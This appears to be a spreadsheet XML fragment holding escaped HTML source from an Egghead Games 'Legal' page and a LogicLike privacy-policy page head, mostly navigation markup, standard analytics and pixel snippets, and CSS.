ampaigns_new_image_layout_picker","campaigns_show_featured_templates","background_art_onboarding","nested_categories_migration_enabled","multilingual_transactional_emails","commerce_etsy_product_import","crm_enable_recaptcha_v3_enterprise","send_local_pickup_ready_email","member_areas_schedule_interview","member_areas_provisioning_service","campaigns_global_uc_ab"],"videoAssetsFeatureFlags":["mux-data-video-collection","mux-data-course-collection"],"impersonatedSession":false,"tzData":{"zones":[[-480,"US","P%sT",null]],"rules":{"US":[[1967,2006,null,"Oct","lastSun","2:00","0","S"],[1987,2006,null,"Apr","Sun&gt;=1","2:00","1:00","D"],[2007,"max",null,"Mar","Sun&gt;=8","2:00","1:00","D"],[2007,"max",null,"Nov","Sun&gt;=1","2:00","0","S"]]}},"showAnnouncementBar":false,"recaptchaEnterpriseContext":{"recaptchaEnterpriseSiteKey":"6LdDFQwjAAAAAPigEvvPgEVbb7QBm-TkVJdDTlAv"},"i18nContext":{"timeZoneData":{"id":"America/Los_Angeles","name":"Pacific Time"}}};&lt;/script&gt;&lt;script type="module"&gt;SquarespaceFonts.loadViaContext(); Squarespace.load(window);&lt;/script&gt;
&lt;script data-sqs-type="imageloader-bootstrapper" type="module"&gt;if(window. ImageLoader) window.ImageLoader.bootstrap({}, document);&lt;/script&gt;
&lt;script type="module"&gt;Squarespace.afterBodyLoad(Y);&lt;/script&gt;
&lt;script type="application/ld+json"&gt;{"url":"https://eggheadgames.com","name":"Egghead Games","description":"","image":"//images.squarespace-cdn.com/content/v1/554022b0e4b0b06c81b84245/1430432585258-CPJNO4B5QLNGUDV86EPW/color-on-white-%28preferred%29-512.png","@context":"http://schema.org","@type":"WebSite"}&lt;/script&gt;&lt;script type="application/ld+json"&gt;{"legalName":"Egghead Games","address":"PO Box 1142\nSolana</t>
  </si>
  <si>
    <t>Beach CA 92075","email":"support+website@eggheadgames.com","telephone":"","sameAs":["http://www.facebook.com/EggheadGames","https://twitter.com/eggheadgamesllc"],"@context":"http://schema.org","@type":"Organization"}&lt;/script&gt;&lt;script type="application/ld+json"&gt;{"address":"PO Box 1142\nSolana Beach CA 92075","image":"https://static1.squarespace.com/static/554022b0e4b0b06c81b84245/t/5542ab48e4b0b65e672b93de/1589183666637/","name":"Egghead Games","openingHours":", , , , , , ","@context":"http://schema.org","@type":"LocalBusiness"}&lt;/script&gt;&lt;link rel="stylesheet" type="text/css" href="https://static1.squarespace.com/static/sitecss/554022b0e4b0b06c81b84245/54/503ba86de4b04953d0f49846/554022b0e4b0b06c81b8424d/1670/site.css"/&gt;&lt;script&gt;Static. COOKIE_BANNER_CAPABLE = true;&lt;/script&gt;
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-50796017-1"&gt;&lt;/script&gt;&lt;script&gt;window.dataLayer = window.dataLayer ||</t>
  </si>
  <si>
    <t xml:space="preserve">[];function gtag(){dataLayer.push(arguments);}gtag('js', new Date());gtag('set', 'developer_id.dZjQwMz', true);gtag('config', 'UA-50796017-1');&lt;/script&gt;&lt;!-- End of Squarespace Headers --&gt;
    &lt;script defer="defer" src="https://static1.squarespace.com/static/ta/5016d42984ae3ecc9e018d91/1670/scripts/site-bundle.js" type="text/javascript"&gt;&lt;/script&gt;
  &lt;/head&gt;
  &lt;body class="canvas-setting-full-width   banner-content-page-title-description banner-alignment-center page-thumbnail-as-banner stretch-page-thumbnail top-navigation-position-above-banner top-navigation-alignment-left disable-navigation-border  sidebar-position-right underline-sidebar-h3  footer-alignment-center  social-icon-style-round social-icon-placement-top-only  blog-list-display-full blog-byline-bottom blog-dateline-top disable-pagination-border    show-products-category-navigation hide-album-share-link  event-show-past-events event-thumbnails event-thumbnail-size-32-standard event-date-label  event-list-show-cats event-list-date event-list-time event-list-address   event-icalgcal-links  event-excerpts      gallery-design-slideshow aspect-ratio-auto lightbox-style-dark gallery-navigation-thumbnails gallery-info-overlay-always-show gallery-aspect-ratio-32-standard gallery-arrow-style-round-corners gallery-transitions-fade gallery-show-arrows gallery-auto-crop   product-list-titles-under product-list-alignment-center product-item-size-43-four-thirds product-image-auto-crop product-gallery-size-32-standard product-gallery-auto-crop show-product-price show-product-item-nav product-social-sharing tweak-v1-related-products-image-aspect-ratio-11-square tweak-v1-related-products-details-alignment-center newsletter-style-dark hide-opentable-icons opentable-style-dark small-button-style-solid small-button-shape-rounded medium-button-style-solid medium-button-shape-rounded large-button-style-solid large-button-shape-square image-block-poster-text-alignment-center image-block-card-dynamic-font-sizing image-block-card-content-position-center image-block-card-text-alignment-left image-block-overlap-dynamic-font-sizing image-block-overlap-content-position-center image-block-overlap-text-alignment-left image-block-collage-dynamic-font-sizing image-block-collage-content-position-top image-block-collage-text-alignment-left image-block-stack-dynamic-font-sizing image-block-stack-text-alignment-left button-style-solid button-corner-style-rounded tweak-product-quick-view-button-style-floating tweak-product-quick-view-button-position-bottom tweak-product-quick-view-lightbox-excerpt-display-truncate tweak-product-quick-view-lightbox-show-arrows tweak-product-quick-view-lightbox-show-close-button tweak-product-quick-view-lightbox-controls-weight-light native-currency-code-usd collection-5543b3e0e4b079a47a690f29 collection-type-page collection-layout-default mobile-style-available has-logo-image has-page-thumbnail" id="collection-5543b3e0e4b079a47a690f29" ontouchstart=""&gt;
&lt;!--MOBILE--&gt;
&lt;nav id="mobile-navigation"&gt;
  &lt;span id="mobile-navigation-title"&gt;&lt;a href="/"&gt;Egghead Games&lt;/a&gt;&lt;/span&gt;
  &lt;span id="mobile-navigation-label"&gt;&lt;/span&gt;
  &lt;ul&gt;
      &lt;li class=""&gt;
            &lt;a href="/"&gt;Home&lt;/a&gt;
      &lt;/li&gt;
      &lt;li class=""&gt;
          &lt;input type="checkbox" name="folder-toggle-5542986be4b090e0afa5a220" id="folder-toggle-5542986be4b090e0afa5a220" class="folder-toggle-box hidden" /&gt;
          &lt;label for="folder-toggle-5542986be4b090e0afa5a220" class="folder-toggle-label"&gt;Puzzles&lt;/label&gt;
                &lt;a href="/logicpuzzles" class=""&gt;Logic Puzzles&lt;/a&gt;
                &lt;a href="/logicproblems" class=""&gt;Logic Problems&lt;/a&gt;
                &lt;a href="/quicklogicproblems" class=""&gt;Quick Logic Puzzles&lt;/a&gt;
                &lt;a href="/logicpuzzleseducation" class=""&gt;Education Logic Puzzles&lt;/a&gt;
                &lt;a href="/acrostics" class=""&gt;Acrostics&lt;/a&gt;
                &lt;a href="/cryptograms" class=""&gt;Cryptograms&lt;/a&gt;
                &lt;a href="/logigrammes" class=""&gt;Logigrammes&lt;/a&gt;
      &lt;/li&gt;
      &lt;li class=""&gt;
            &lt;a href="/blog"&gt;Blog&lt;/a&gt;
      &lt;/li&gt;
      &lt;li class=""&gt;
            &lt;a href="/support"&gt;Support&lt;/a&gt;
      &lt;/li&gt;
      &lt;li class=""&gt;
            &lt;a href="/contact"&gt;Contact&lt;/a&gt;
      &lt;/li&gt;
  &lt;/ul&gt;
&lt;/nav&gt;
	  &lt;div id="canvas-wrapper"&gt;
	  	&lt;div id="canvas"&gt;
				&lt;div id="page-header-wrapper"&gt;
					&lt;div id="page-header"&gt;
				    &lt;div id="navigation-top"&gt;
				    	&lt;div class="horizontal-navigation-bar clear with-logo"&gt;
				    		&lt;!-- // logo or site title markup in nav area --&gt;
						      &lt;div id="banner-wrapper" data-content-field="site-title"&gt;
						        &lt;a href="/"&gt;&lt;img id="banner" src="//images.squarespace-cdn.com/content/v1/554022b0e4b0b06c81b84245/1430432585258-CPJNO4B5QLNGUDV86EPW/color-on-white-%28preferred%29-512.png?format=1500w" alt="Egghead Games" /&gt;&lt;/a&gt;
						      &lt;/div&gt;
&lt;nav id="main-navigation" class="main-nav" data-content-field="navigation"&gt;
  &lt;ul&gt;
    &lt;li class="page-collection"&gt;&lt;a href="/"&gt;Home&lt;/a&gt;&lt;span class="delimiter"&gt;/&lt;/span&gt;&lt;/li&gt;
    &lt;li aria-haspopup="true" class="folder-collection folder"&gt;&lt;a href="#" onClick="return false;"&gt;Puzzles&lt;/a&gt;&lt;span class="delimiter"&gt;/&lt;/span&gt;&lt;div class="subnav"&gt;&lt;ul&gt;&lt;li class="page-collection"&gt;&lt;a href="/logicpuzzles"&gt;Logic Puzzles&lt;/a&gt;&lt;/li&gt;&lt;li class="page-collection"&gt;&lt;a href="/logicproblems"&gt;Logic Problems&lt;/a&gt;&lt;/li&gt;&lt;li class="page-collection"&gt;&lt;a href="/quicklogicproblems"&gt;Quick Logic Puzzles&lt;/a&gt;&lt;/li&gt;&lt;li class="page-collection"&gt;&lt;a href="/logicpuzzleseducation"&gt;Education Logic Puzzles&lt;/a&gt;&lt;/li&gt;&lt;li class="page-collection"&gt;&lt;a href="/acrostics"&gt;Acrostics&lt;/a&gt;&lt;/li&gt;&lt;li class="page-collection"&gt;&lt;a href="/cryptograms"&gt;Cryptograms&lt;/a&gt;&lt;/li&gt;&lt;li class="page-collection"&gt;&lt;a href="/logigrammes"&gt;Logigrammes&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/li&gt;
    &lt;li class="blog-collection"&gt;&lt;a href="/blog"&gt;Blog&lt;/a&gt;&lt;span class="delimiter"&gt;/&lt;/span&gt;&lt;/li&gt;
    &lt;li class="page-collection"&gt;&lt;a href="/support"&gt;Support&lt;/a&gt;&lt;span class="delimiter"&gt;/&lt;/span&gt;&lt;/li&gt;
    &lt;li class="page-collection"&gt;&lt;a href="/contact"&gt;Contact&lt;/a&gt;&lt;span class="delimiter"&gt;/&lt;/span&gt;&lt;/li&gt;
  &lt;/ul&gt;
&lt;/nav&gt;
			            &lt;div id="sqs-social" class="social-links sqs-svg-icon--list" data-content-field="connected-accounts"&gt;
  &lt;a href="https://www.facebook.com/EggheadGames" target="_blank" class="sqs-svg-icon--wrapper facebook"&gt;
    &lt;div&gt;
      &lt;svg class="sqs-svg-icon--social" viewBox="0 0 64 64"&gt;
        &lt;use class="sqs-use--icon" xlink:href="#facebook-icon"&gt;&lt;/use&gt;
        &lt;use class="sqs-use--mask" xlink:href="#facebook-mask"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/div&gt;
  &lt;/a&gt;
  &lt;a href="https://twitter.com/eggheadgamesllc" target="_blank" class="sqs-svg-icon--wrapper twitter"&gt;
    &lt;div&gt;
      &lt;svg class="sqs-svg-icon--social" viewBox="0 0 64 64"&gt;
        &lt;use class="sqs-use--icon" xlink:href="#twitter-icon"&gt;&lt;/use&gt;
        &lt;use class="sqs-use--mask" xlink:href="#twitter-mask"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/div&gt;
  &lt;/a&gt;
			            &lt;/div&gt;
				    	&lt;/div&gt;
				    &lt;/div&gt;&lt;!-- navigation-top --&gt;
						&lt;div id="banner-area-wrapper"&gt;
							&lt;div id="banner-area"&gt;
							&lt;!-- // page thumbnail image as banner image --&gt;
                    &lt;div id="page-thumb" class="content-fill"&gt;
                      &lt;img data-src="https://images.squarespace-cdn.com/content/v1/554022b0e4b0b06c81b84245/1430500645434-2O53PK3AAMN0D8HTSXJ1/PennyDell-Header-Image.jpg" data-image="https://images.squarespace-cdn.com/content/v1/554022b0e4b0b06c81b84245/1430500645434-2O53PK3AAMN0D8HTSXJ1/PennyDell-Header-Image.jpg" data-image-dimensions="1400x780" data-image-focal-point="0.4966442953020134,0.12" alt="PennyDell-Header-Image.jpg"  /&gt;
                    &lt;/div&gt;
							&lt;div class="banner-overlay"&gt;&lt;/div&gt;
				      &lt;!-- // logo or site title markup in banner area --&gt;
					      &lt;div id="banner-wrapper" data-content-field="site-title"&gt;
					        &lt;a href="/" rel="bookmark"&gt;
					        	&lt;img id="banner" src="//images.squarespace-cdn.com/content/v1/554022b0e4b0b06c81b84245/1430432585258-CPJNO4B5QLNGUDV86EPW/color-on-white-%28preferred%29-512.png?format=1500w" alt="Egghead Games" /&gt;
						      &lt;/a&gt;
					      </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/div&gt;
							&lt;!-- // page title markup in banner area --&gt;
					      &lt;div id="page-title-wrapper" class="js-text-shrink" data-collection-id="5543b3e0e4b079a47a690f29" data-edit-main-image="Page Banner"&gt;
				          &lt;h1 id="page-title" class="page-title"&gt;Legal&lt;/h1&gt;
				        &lt;/div&gt;
				      &lt;/div&gt;
				    &lt;/div&gt;&lt;!-- banner-area-wrapper --&gt;
				    &lt;div id="navigation-bottom"&gt;
				    	&lt;div class="horizontal-navigation-bar clear with-logo"&gt;
				    		&lt;!-- // logo or site title markup in nav area -- &gt;
						      &lt;div id="banner-wrapper" data-content-field="site-title"&gt;
						        &lt;a href="/"&gt;&lt;img id="banner" src="//images.squarespace-cdn.com/content/v1/554022b0e4b0b06c81b84245/1430432585258-CPJNO4B5QLNGUDV86EPW/color-on-white-%28preferred%29-512.png?format=1500w" alt="Egghead Games" /&gt;&lt;/a&gt;
						      &lt;/div&gt;
&lt;nav id="main-navigation" class="main-nav" data-content-field="navigation"&gt;
  &lt;ul&gt;
    &lt;li class="page-collection"&gt;&lt;a href="/"&gt;Home&lt;/a&gt;&lt;span class="delimiter"&gt;/&lt;/span&gt;&lt;/li&gt;
    &lt;li aria-haspopup="true" class="folder-collection folder"&gt;&lt;a href="#" onClick="return false;"&gt;Puzzles&lt;/a&gt;&lt;span class="delimiter"&gt;/&lt;/span&gt;&lt;div class="subnav"&gt;&lt;ul&gt;&lt;li class="page-collection"&gt;&lt;a href="/logicpuzzles"&gt;Logic Puzzles&lt;/a&gt;&lt;/li&gt;&lt;li class="page-collection"&gt;&lt;a href="/logicproblems"&gt;Logic Problems&lt;/a&gt;&lt;/li&gt;&lt;li class="page-collection"&gt;&lt;a href="/quicklogicproblems"&gt;Quick Logic Puzzles&lt;/a&gt;&lt;/li&gt;&lt;li class="page-collection"&gt;&lt;a href="/logicpuzzleseducation"&gt;Education Logic Puzzles&lt;/a&gt;&lt;/li&gt;&lt;li class="page-collection"&gt;&lt;a href="/acrostics"&gt;Acrostics&lt;/a&gt;&lt;/li&gt;&lt;li class="page-collection"&gt;&lt;a href="/cryptograms"&gt;Cryptograms&lt;/a&gt;&lt;/li&gt;&lt;li class="page-collection"&gt;&lt;a href="/logigrammes"&gt;Logigrammes&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/li&gt;
    &lt;li class="blog-collection"&gt;&lt;a href="/blog"&gt;Blog&lt;/a&gt;&lt;span class="delimiter"&gt;/&lt;/span&gt;&lt;/li&gt;
    &lt;li class="page-collection"&gt;&lt;a href="/support"&gt;Support&lt;/a&gt;&lt;span class="delimiter"&gt;/&lt;/span&gt;&lt;/li&gt;
    &lt;li class="page-collection"&gt;&lt;a href="/contact"&gt;Contact&lt;/a&gt;&lt;span class="delimiter"&gt;/&lt;/span&gt;&lt;/li&gt;
  &lt;/ul&gt;
&lt;/nav&gt;
                  &lt;div id="sqs-social" class="social-links sqs-svg-icon--list" data-content-field="connected-accounts"&gt;
  &lt;a href="https://www.facebook.com/EggheadGames" target="_blank" class="sqs-svg-icon--wrapper facebook"&gt;
    &lt;div&gt;
      &lt;svg class="sqs-svg-icon--social" viewBox="0 0 64 64"&gt;
        &lt;use class="sqs-use--icon" xlink:href="#facebook-icon"&gt;&lt;/use&gt;
        &lt;use class="sqs-use--mask" xlink:href="#facebook-mask"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/div&gt;
  &lt;/a&gt;
  &lt;a href="https://twitter.com/eggheadgamesllc" target="_blank" class="sqs-svg-icon--wrapper twitter"&gt;
    &lt;div&gt;
      &lt;svg class="sqs-svg-icon--social" viewBox="0 0 64 64"&gt;
        &lt;use class="sqs-use--icon" xlink:href="#twitter-icon"&gt;&lt;/use&gt;
   </t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html             
    &gt;
&lt;head&gt;
    &lt;meta name="yandex-verification" content="5607bc43e7cb51d2" /&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge" /&gt;
    &lt;!-- Google Analytics --&gt;&lt;script&gt;
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  var gaUserParamRelations = {cardId: 'dimension1', region: 'dimension2', targetLessons: 'dimension3', locale: 'dimension4', userId: 'dimension5', logicPayed: 'dimension6'};
  ga('create', 'UA-41489468-5', 'auto');
  ga('require', 'GTM-P2LXT59');
  ga('require', 'ecommerce');
  ga('send', 'pageview');
&lt;/script&gt;&lt;!-- Google Analytics End --&gt;
&lt;!-- Global site tag (gtag.js) - Google Analytics --&gt;
&lt;script async src='https://www.googletagmanager.com/gtag/js?id=AW-676514460'&gt;&lt;/script&gt;
&lt;script&gt;
window.dataLayer = window.dataLayer ||</t>
  </si>
  <si>
    <t>[];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'AW-676514460');
&lt;/script&gt;
&lt;!-- End Global site tag (gtag.js) - Google Analytics --&gt;
&lt;!-- Google Tag Manager --&gt;
&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-TTNJSK');&lt;/script&gt;
&lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">End Google Tag Manager --&gt;
&lt;!-- Facebook Pixel Code --&gt;
&lt;script&gt;
    ! function(f,b,e,v,n,t,s)
    {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
    </t>
  </si>
  <si>
    <t>n.callMethod.apply(n,arguments):n.queue.push(arguments)};
    if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
    n.queue=[];t=b.createElement(e);t.async=!0;
    t.src=v;s=b.getElementsByTagName(e)[0];
    s.parentNode.insertBefore(t,s)}(window, document,'script',
    'https://connect.facebook.net/en_US/fbevents.js');
    fbq('init', '498921350824465');
    fbq('track', 'PageView');
&lt;/script&gt;
&lt;noscript&gt;&lt;img height="1" width="1" style="display:none"
    src="https://www.facebook.com/tr?id=498921350824465&amp;ev=PageView&amp;noscript=1"
/&gt;&lt;/noscript&gt;
&lt;!-- End Facebook Pixel Code --&gt;&lt;!--VK pixel Code--&gt;
&lt;script type="text/javascript"&gt;(window. Image ?</t>
  </si>
  <si>
    <t>(new Image()) : document.createElement('img')).src = 'https://vk.com/rtrg?p=VK-RTRG-214272-9mahb';&lt;/script&gt;
&lt;!-- End VK pixel Code --&gt;&lt;!--</t>
  </si>
  <si>
    <t>Amplitude --&gt;
   &lt;script type="text/javascript"&gt;
  (function(e,t){var n=e.amplitude||{_q:[],_iq:{}};var r=t.createElement("script")
  ;r.type="text/javascript";r.async=true
  ;r.src="https://cdn.amplitude.com/libs/amplitude-4.4.0-min.gz.js"
  ;r.onload=function(){if(e.amplitude.runQueuedFunctions){
  e.amplitude.runQueuedFunctions()}else{
  console.log("[Amplitude] Error: could not load SDK")}}
  ;var i=t.getElementsByTagName("script")[0];i.parentNode.insertBefore(r,i)
  ;function s(e,t){e.prototype[t]=function(){
  this._q.push([t].concat(Array.prototype.slice.call(arguments,0)));return this}}
  var o=function(){this._q=[];return this}
  ;var a=["add","append","clearAll","prepend","set","setOnce","unset"]
  ;for(var u=0;u&lt;a.length;u++){s(o,a[u])}n. Identify=o;var c=function(){this._q=[]
  ;return this}
  ;var l=["setProductId","setQuantity","setPrice","setRevenueType","setEventProperties"]
  ;for(var p=0;p&lt; l.length;p++){s(c,l[p])}n.</t>
  </si>
  <si>
    <t xml:space="preserve">Revenue=c
  ;var d=["init","logEvent","logRevenue","setUserId","setUserProperties","setOptOut","setVersionName","setDomain","setDeviceId","setGlobalUserProperties","identify","clearUserProperties","setGroup","logRevenueV2","regenerateDeviceId","logEventWithTimestamp","logEventWithGroups","setSessionId","resetSessionId"]
  ;function v(e){function t(t){e[t]=function(){
  e._q.push([t].concat(Array.prototype.slice.call(arguments,0)))}}
  for(var n=0;n&lt;d.length;n++){t(d[n])}}v(n);n.getInstance=function(e){
  e=(!e||e.length===0?"$default_instance":e).toLowerCase()
  ;if(!n._iq.hasOwnProperty(e)){n._iq[e]={_q:[]};v(n._iq[e])}return n._iq[e]}
  ;e.amplitude=n})(window,document);
  amplitude.getInstance().init("47e3a3cc3bc42aaf0b0c7b6c3775d793");
&lt;/script&gt;&lt;!-- End Amplitude --&gt;&lt;script type='text/javascript'&gt;(function() {
  var s = document.createElement('script'); s.type = 'text/javascript'; s.async = true; s.src = 'https://logiclike.com/tool/session-counter.js?r=' + encodeURIComponent(document.referrer); var ss = document.getElementsByTagName('script')[0]; ss.parentNode.insertBefore(s, ss);
})();&lt;/script&gt;
        </t>
  </si>
  <si>
    <t>&lt;title&gt;LogicLike privacy and data processing policy&lt;/title&gt;
    &lt;meta name="charset" content="utf-8"&gt;
&lt;meta name="viewport" content="width=device-width, shrink-to-fit=no"&gt;
&lt;meta property="og:image" content="https://logiclike.com/images/share/logiclike.png?v=1"&gt;
&lt;meta property="og:image:width" content="968"&gt;
&lt;meta property="og:image:height" content="504"&gt;
&lt;meta name="twitter:image" content="https://logiclike.com/images/share/logiclike.png?v=1"&gt;
&lt;meta property="og:type" content="website"&gt;
&lt;meta name="twitter:card" content="summary_large_image"&gt;
&lt;meta name="msapplication-TileColor" content="#da532c"&gt;
&lt;meta name="msapplication-TileImage" content="/mstile-144x144.png"&gt;
&lt;meta name="theme-color" content="#ffffff"&gt;
    &lt;style type="text/css"&gt;body {_x005F_x000D_
        line-height: 108%;_x005F_x000D_
        font-family: Calibri;_x005F_x000D_
        font-size: 11pt;_x005F_x000D_
            margin: 24px;_x005F_x000D_
    }_x005F_x000D_
_ x000D_
    h2, h3, h4, p {_x005F_x000D_
        margin: 0pt 0pt</t>
  </si>
  <si>
    <t>8pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    li, table {_x005F_x000D_
        margin-top: 0pt;_x005F_x000D_
        margin-bottom: 8pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    h2 {_x005F_x000D_
        margin-top: 5pt;_x005F_x000D_
        margin-bottom: 5pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-family: 'Times New Roman';_x005F_x000D_
        font-size: 18pt;_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    h3 {_x005F_x000D_
        margin-top: 5pt;_x005F_x000D_
        margin-bottom: 5pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-family: ' Times New Roman';_x005F_x000D_
        font-size: 13.5pt;_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }_x005F_x000D_
_ x000D_
    h4 {_x005F_x000D_
        margin-top: 5pt;_x005F_x000D_
        margin-bottom: 5pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-family: 'Times New Roman';_x005F_x000D_
        font-size: 12pt;_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .CommentSubject {_x005F_x000D_
        margin-bottom: 8pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-size: 10pt;_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .CommentText {_x005F_x000D_
        margin-bottom: 8pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-size: 10pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .Footer {_x005F_x000D_
        margin-bottom: 0pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-size: 11pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .Header</t>
  </si>
  <si>
    <t>{_x005F_x000D_
        margin-bottom: 0pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-size: 11pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .NoSpacing {_x005F_x000D_
        margin-bottom: 0pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-size: 11pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .NormalWeb { _x005F_x000D_
        margin-top: 5pt;_x005F_x000D_
        margin-bottom: 5pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-family: 'Times New Roman';_x005F_x000D_
        font-size: 12pt_x005F_x000D_
    }_x005F_x000D_
_ x000D_
    span.</t>
  </si>
  <si>
    <t>CommentReference {_x005F_x000D_
        font-size: 8pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span. Emphasis {_x005F_x000D_
        font-style: italic_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span. Hyperlink {_x005F_x000D_
        text-decoration: underline;_x005F_x000D_
        color: #0000ff_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span.</t>
  </si>
  <si>
    <t xml:space="preserve">Strong {_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span. UnresolvedMention {_x005F_x000D_
        color: #605e5c;_x005F_x000D_
        background-color: #e1dfdd_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span.\32  {_x005F_x000D_
        font-family: 'Times New Roman';_x005F_x000D_
        font-size: 18pt;_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span.\33  {_x005F_x000D_
        font-family: 'Times New Roman';_x005F_x000D_
        font-size: 13.5pt;_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span.\34  {_x005F_x000D_
        font-family: 'Times New Roman';_x005F_x000D_
        font-size: 12pt;_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span.a {_x005F_x000D_
        font-size: 10pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span.a0 {_x005F_x000D_
        font-size: 10pt;_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }&lt;/style&gt;
                &lt;noscript&gt;&lt;/noscript&gt;
&lt;link href="/favicon.ico?1" rel="icon" sizes="any"&gt;
&lt;link href="/favicon.svg" rel="icon" type="image/svg+xml"&gt;
&lt;link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"&gt;
&lt;link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png"&gt;
&lt;link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"&gt;
</t>
  </si>
  <si>
    <t>&lt;link rel="manifest" href="/manifest.json"&gt;
&lt;link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5"&gt;
            &lt;style type="text/css" media="screen"&gt;
&lt;!--
#loading{
    height: 100%;
    width: 100%;
    position: fixed;
    top: 0;
    left: 0;
    bottom: 0;
     right: 0;
}
.loader--with-bg {
    background-color: #ffffff;
    z-index: 20000;
}
.loader--with-transparent-bg {
    background-color: rgba(32,46,70,.8);
    z-index: 1000;
}
#loading.fadeOut {
    -webkit-animation-duration: 500ms;
    animation-duration: 500ms;
}
#loading-center-absolute {
    position: absolute;
    left: 50%;
    top: 50%;
    height: 60px;
    width: 60px;
    margin-top: -30px;
    margin-left: -30px;
    -webkit-animation: loading-center-absolute 1s infinite;
    animation: loading-center-absolute 1s infinite;
}
.object{
    width: 20px;
    height: 20px;
    background-color: #5cbb73;
    float: left;
    border-radius: 50% 50% 50% 50%;
    margin-right: 20px;
    margin-bottom: 20px;
}
.object:nth-child(2n+0) {
    margin-right: 0;
}
#object_one{
    -webkit-animation: object_one 1s infinite;
    animation: object_one 1s infinite;
}
#object_two{
    -webkit-animation: object_two 1s infinite;
    animation: object_two 1s infinite;
}
#object_three{
    -webkit-animation: object_three 1s infinite;
    animation: object_three 1s infinite;
}
#object_four{
    -webkit-animation: object_four 1s infinite;
    animation: object_four 1s infinite;
}
@-webkit-keyframes loading-center-absolute{
    100% {
        -webkit-transform: rotate(360deg);
    }
}
@keyframes loading-center-absolute{
    100% {
        -ms-transform: rotate(360deg);
        transform: rotate(360deg);
    }
}
@-webkit-keyframes object_one{
    50% {
        -webkit-transform: translate(20px,20px);
    }
}
@keyframes object_one{
    50% {
        -ms-transform: translate(20px,20px);
        transform: translate(20px,20px);
    }
}
@-webkit-keyframes object_two{
    50% {
        -webkit-transform: translate(-20px,20px);
    }
}
@keyframes object_two{
    50% {
        -ms-transform: translate(-20px,20px);
        transform: translate(-20px,20px);
    }
}
@-webkit-keyframes object_three{
    50% {
        -webkit-transform: translate(20px,-20px);
    }
}
@keyframes object_three{
    50% {
        -ms-transform: translate(20px,-20px);
        transform: translate(20px,-20px);
    }
}
@-webkit-keyframes object_four{
    50% {
        -webkit-transform: translate(-20px,-20px);
    }
}
@keyframes object_four{
    50% {
        -ms-transform: translate(-20px,-20px);
        transform: translate(-20px,-20px);
    }
}
--&gt;
&lt;/style&gt;
            &lt;script type="text/javascript"&gt;
    //&lt;!--
    var PageLoader = {
    LOADER_PENDING_TIME: 250,
    _amountOfLoadingItems: 0,
    insertLoaderTimer: null,
    loadedItems: [],
    decrementAmountOfLoadingItems: function () {
        if (this.insertLoaderTimer) {
            clearTimeout(this.insertLoaderTimer);
            this.insertLoaderTimer = null;
        }
        this._amountOfLoadingItems--;
        if (this._amountOfLoadingItems === 0) {
            var loading = document.getElementById('loading');
            if (loading) {
                loading.classList.add('animated');
                loading.classList.add('fadeOut');
                loading.classList.remove('fadeIn');
                setTimeout(function () {
